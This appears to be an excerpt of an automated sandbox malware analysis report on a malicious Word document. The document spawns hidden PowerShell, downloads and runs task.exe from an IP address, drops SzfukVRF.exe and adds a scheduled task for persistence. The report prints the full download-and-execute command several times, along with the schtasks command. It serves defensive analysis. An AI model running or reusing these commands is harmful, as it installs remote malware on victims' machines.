Source: SzfukVRF.exe.9.dr, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.2.task.exe.cf0000.1.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.task.exe.cf0000.0.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.0.task.exe.cf0000.2.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.0.task.exe.cf0000.12.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.0.task.exe.cf0000.3.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.0.task.exe.cf0000.6.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Suspicious powershell command line found

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'	Jump to behavior

Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 9_2_00CF9347 push ds; ret	9_2_00CF934C
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 9_2_00CF9361 push ds; retf	9_2_00CF9364
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 9_2_00CF92F5 push ds; ret	9_2_00CF9340
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_00CF9347 push ds; ret	14_2_00CF934C
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_00CF9361 push ds; retf	14_2_00CF9364
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_00CF92F5 push ds; ret	14_2_00CF9340
Source: C:\Users\user\AppData\Roaming\task.exe	Code function: 14_2_00BE21C8 push esp; retn 0039h	14_2_00BE2211

Source: initial sample	Static PE information: section name: .text entropy: 7.88557099769
Source: initial sample	Static PE information: section name: .text entropy: 7.88557099769
Source: initial sample	Static PE information: section name: .text entropy: 7.88557099769

Persistence and Installation Behavior:

Tries to download and execute files (via powershell)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'	Jump to behavior

Source: C:\Users\user\AppData\Roaming\task.exe	File created: C:\Users\user\AppData\Roaming\SzfukVRF.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\task.exe	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exe	Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\AppData\Roaming\task.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
